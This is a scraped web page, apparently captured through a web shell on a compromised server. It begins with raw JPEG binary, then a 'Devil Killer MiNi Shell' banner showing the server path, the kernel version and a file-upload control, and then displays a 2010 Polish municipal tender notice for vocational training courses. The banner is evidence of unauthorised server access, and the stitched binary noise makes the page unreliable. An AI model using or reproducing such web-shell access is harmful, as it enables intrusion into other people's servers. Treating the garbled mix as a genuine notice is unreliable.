JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100721/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100721/219012-N-2010.html

<p class="kh_header"><b>Wola Krzysztoporska: szkoleń zawodowych dla uczestników projektu Mój nowy zawód.</b><br>
<b>Numer ogłoszenia: 219012 - 2010; data zamieszczenia: 21.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wola Krzysztoporska , ul. Kościuszki 5/11, 97-371 Wola Krzysztoporska, woj. łódzkie, tel. (044) 61-63-961, faks (044) 61-63-960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola-krzysztoporska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkoleń zawodowych dla uczestników projektu Mój nowy zawód..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.

Szkolenia realizowane są w ramach projektu Mój nowy zawód współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013: Priorytet VIII. Regionalne kadry gospodarki. Działanie 8.1. Rozwój pracowników i przedsiębiorstw  w regionie. Poddziałanie 8.1.2 Wsparcie procesów adaptacyjnych i modernizacyjnych w regionie. 


1.	Zamawiający  wymaga złożenia ofert na następujące części zamówienia:

Część I. Przeprowadzenie szkolenia : Bukieciarstwo i florystyka.


Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:

Lp.	Nazwa przedmiotu	Liczba godzin 
1.	Botanika - wprowadzenie do bukieciarstwa
- gatunki roślin, szkodniki,nawożenie i przedłużanie żywotności
- technika suszenia roślin i ich przechowywanie;
- dobór gatunków roślin i przygotowanie do suszenia.
	4
2.	Dekoracje pogrzebowe 
- dobór materiałów do dekoracji pogrzebowych;
- wieniec obręczowy - technika wykonania;
- wieniec poduszkowy - technika wykonania;
- wiązanki pogrzebowe - rodzaje i technika wykonania.
	30
3.	Wyroby ślubne i komunijne
- rodzaje wiązanek ślubnych i zasady układania roślin;
- materiał roślinny i materiały pomocnicze do wiązanek ślubnych;
- wiązanka spływająca;
- wiązanki fantazyjne;
- dobór gatunków roślin do wianka;
- technika wykonywania wianka i wiązanki komunijnej.
	30
4.	Wiązanki i dekoracje okolicznościowe 
- zasady doboru kwiatów do kompozycji;
- technika układania kwiatów w ręku;
- technika układania kwiatów w naczyniach;
- stroiki na Boże Narodzenie i Wielkanoc.
	30
5	Stylizacja wnętrz materiałem roślinnym np. kościołów,sal weselnych itp.
-dekoracje	26
	RAZEM	120

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ
     
Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 8,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 3 osób.

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych Dz.U. 06.Nr 31.poz 216 ze zmianami.

Kod CPV: 80500000-9 Usługi szkoleniowe


Część II. Przeprowadzenie szkolenia : Księgowość od podstaw.

Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1.	pełna księgowość i rachunkowość, sporządzanie sprawozdań finansowych i bilansu  - 30 godzin,
2.	zastosowanie komputerowych programów  w księgowości - 40 godzin,
3.	podatki - rozliczenia z urzędem skarbowym - 10 godzin,
4.	płace, program płatnik, rozliczenia z zus-em  - 25 godzin,
5.	książka przychodów i rozchodów - 15 godzin
Razem 	120 godzin

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ

Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.
Liczba osób objęta  szkoleniem - 11,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 6 osób.
Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych Dz.U. 06.Nr 31.poz 216 ze zmianami.

Kod CPV: 80500000-9 Usługi szkoleniowe

Część III. Przeprowadzenie szkolenia: Kurs kosmetyczny z elementami wizażu i stylizacja paznokci.

Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
   1.Moduł kosmetyczny z elementami wizażu obejmuje 100 godzin dydaktycznych. 
   W programie m.in.: 
	analiza kolorystyczna - typy urody, dobór kolorów do typu urodu
	korekta twarzy - techniczne możliwości poprawienia niedoskonałości urody za pomocą makijażu
	makijaż i stylizacja 
	pielęgnacja twarzy - zabiegi pielęgnacyjne skóry twarzy, wykonanie henny,
	pielęgnacja kończyn górnych 
	pielęgnacja kończyn dolnych 
	masaż kosmetyczny 
2. Moduł stylizacji paznokci obejmuje 40 godzin dydaktycznych
W programie m.in.: 
	choroby i budowa paznokci - podstawowe wiadomości
	manicure i pedicure - abc zadbanych paznokci                                  
	masaż dłoni i stóp 
	przedłużanie paznokci metodą akrylową czyli sztuka modelowania 
	przedłużanie paznokci metodą żelową czyli utwardzanie 
	elementy zdobnictwa 
	
Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ

Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 7,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 3 osób.
Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych Dz.U. 06.Nr 31.poz 216 ze zmianami.

Kod CPV: 80500000-9 Usługi szkoleniowe


Część IV. Przeprowadzenie szkolenia: Podstawy gospodarki magazynowej z obsługą wózków jezdniowych.

Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1. Kierowca wózków jezdniowych z napędem silnikowym z uprawnieniami do obsługi - wymiany butli gazowej w wózkach wyposażonych w instalację do zasilania gazem
67 godz.., w tym:
- 47 godz. zajęć teoretycznych
- 20 godz. zajęć praktycznych, w tym 5 godz. w zakresie obsługi wymiany butli gazowej
Szkolenie ma na celu przygotowanie do obsługiwania wózków jezdniowych w transporcie wewnątrzzakładowym. Tematyka zajęć:
-  typy stosowanych wózków jezdniowych,
-  budowa wózka,
- czynności operatora przy obsłudze wózków przed rozpoczęciem pracy, w czasie pracy,                                          po zakończeniu pracy,
- ładunkoznawstwo,
- wiadomości z zakresu bhp,
- wiadomości o dozorze technicznym,
- przygotowanie do wykonania czynności związanych z wymianą butli, pokaz, próbne wykonanie wymiany butli przez kierowcę, samodzielna wymiana butli.
Egzamin kwalifikacyjny przed Komisją Urzędu Dozoru Technicznego.
2. PODSTAWY KSIEGOWOŚCI MAGAZYNOWEJ
80 godz. - 100% zajęcia praktyczne na komputerze
	Magazyn,
	Płatności,	
Faktura,
	Raporty
4. PRAWO SPOŻYWCZE Dobra Praktyka Produkcyjna - GMP, Dobra Praktyka Higieniczna - GHP i zasady HACCP
10 godz. = 5 godz.  wykładów + 5 godz. ćwiczeń
u osób podejmujących pracę w miejscach gdzie występuje kontakt z artykułami spożywczymi.
Tematyka zajęć:
	geneza i rozwój systemów jakości,
	zarządzanie bezpieczeństwem żywności,
	kontrola wewnętrzna - wymagania,
	zasada GMP, dokumentacja i zapisy,
4. OBSŁUGA KAS FISKALNYCH I WAG ELEKTONICZNYCH
10 godz. - 100% szkolenia praktyczne
Każdy uczestnik ma zapewnione samodzielne stanowisko do ćwiczeń
Tematyka zajęć:
	wyjaśnienie podstawowych pojęć związanych z kasami fiskalnymi, obowiązki prawne 
w zakresie instalowania kas fiskalnych,
	rodzaje kas fiskalnych i informacje o budowie, włączanie, wymiana rolek papieru, taśmy barwiącej, korekta i sygnalizacja błędów, unieważnieniem, wpłata i wypłata pieniędzy, sporządzanie raportów dobowych i okresowych,
	funkcje kas fiskalnych, wykonywanie raportów,
	raporty sprzedaży zerowej, sprzedaży dziennej i dekadowej, programowanie kas,
	konserwacja, naprawa, awarie, zasada postępowania w przypadkach nagłych awarii,
	obowiązki ciążące na użytkowniku kasy 
	urządzenia wagowe,
	funkcje wag elektronicznych.
	zasada GHP, dokumentacja i zapisy.
Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ
     
Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 2,  

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych Dz.U. 06.Nr 31.poz 216 ze zmianami.

Kod CPV: 80500000-9 Usługi szkoleniowe


Część V. Profesjonalna obsługa sekretariatu.

Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1.	podstawy obsługi komputera - 30 godzin,
2.	podstawowe zagadnienia dotyczące organizacji i funkcjonowania firmy - 10 godzin 
3.	organizacja i technika biurowa - 15 godzin zajęć, 
4.	podstawy rachunkowości - 15 godzin zajęć,
5.	stosowanie w pracy biurowej nowoczesnych urządzeń technicznych i elektronicznych - 20  godzin zajęć,
6.	technika pracy własnej, obieg i przechowywanie dokumentacji - 15 godzin zajęć,
7.	elementy wizażu - 15 godzin zajęć.
Razem 	120 godzin

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ.
 
  Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 4.

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych Dz.U. 06.Nr 31.poz 216 ze zmianami.

Kod CPV: 80500000-9 Usługi szkoleniowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w zakresie każdej części zamówienia zobowiązany jest wykazać, że w okresie ostatnich 3 lat zrealizował należycie co najmniej jedno szkolenie podobne do szkolenia stanowiącego przedmiot zamówienia.

W tym celu zobowiązany jest do oferty załączyć wykaz usług szkoleniowych wykonanych, a w przypadku świadczeń ciągłych również wykonywanych, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia,  wykonanych/wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie  -  załącznik  nr 4 do SIWZ

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I : Przeprowadzenie szkolenia : Bukieciarstwo i florystyka.
a) Wykonawca zobowiązany jest wykazać, że dysponuje salą wykładową do przeprowadzenia zajęć w miejscowości Piotrków Tryb. lub Woli Krzysztoporskiej,

Część II. Przeprowadzenie szkolenia : Księgowość od podstaw 
a) Wykonawca zobowiązany jest wykazać, że dysponuje salą wykładową do przeprowadzenia zajęć w miejscowości Piotrków Tryb. lub Woli Krzysztoporskiej,
 Część III. Przeprowadzenie szkolenia: Kurs kosmetyczny z elementami wizażu i stylizacja paznokci  
a) Wykonawca zobowiązany jest wykazać, że dysponuje salą wykładową do przeprowadzenia zajęć w miejscowości Piotrków Tryb. lub Woli Krzysztoporskiej,

Część IV. Przeprowadzenie szkolenia: Podstawy gospodarki magazynowej z obsługą wózków jezdniowych - od dnia zawarcia umowy do dnia 30.11.2010 r. 
a) Wykonawca zobowiązany jest wykazać, że dysponuje placem manewrowym oraz salą wykładową do przeprowadzenia zajęć w miejscowości Piotrków Tryb. lub Woli Krzysztoporskiej,


Część V. Profesjonalna obsługa sekretariatu  - od dnia zawarcia umowy do dnia 31.10.2010 r. 
a) Wykonawca zobowiązany jest wykazać, że dysponuje salą wykładową do przeprowadzenia zajęć w miejscowości Piotrków Tryb. lub Woli Krzysztoporskiej,

W tym celu zobowiązany jest do oferty załączyć wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 7 do SIWZ
Wykonawcy posiadający do przeprowadzenia szkolenia własny plac manewrowy, lub salę wykładową poświadczają ten fakt w rubryce podstawa dysponowania zapisem własny plac manewrowy własna sala wykładowa, w przypadku korzystania z placu manewrowego , lub sali wykładowej innych podmiotów należy wpisać tytuł prawny do dysponowania np. najem, dzierżawa.  

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I : Przeprowadzenie szkolenia : Bukieciarstwo i florystyka.
Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia.
Część II. Przeprowadzenie szkolenia : Księgowość od podstaw 
Wykonawca   zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia.
Część III. Przeprowadzenie szkolenia: Kurs kosmetyczny z elementami wizażu i stylizacja paznokci  
Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia.
Część IV. Przeprowadzenie szkolenia: Podstawy gospodarki magazynowej z obsługą wózków jezdniowych - od dnia zawarcia umowy do dnia 30.11.2010 r. 
Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia.

Część V. Profesjonalna obsługa sekretariatu  - od dnia zawarcia umowy do dnia 31.10.2010 r. 
Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia tj. min. 1 instruktorem posiadającym odpowiednie kwalifikacje zawodowe do prowadzenia szkolenia.

W tym celu zobowiązany jest do oferty załączyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług  wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznika  nr 5 do SIWZ, oraz
Oświadczenie potwierdzające posiadanie wymaganych uprawnień przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia - załącznik nr 6 do SIWZ

Ocena spełnienia tego warunku dokonywana będzie o treść ww. dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

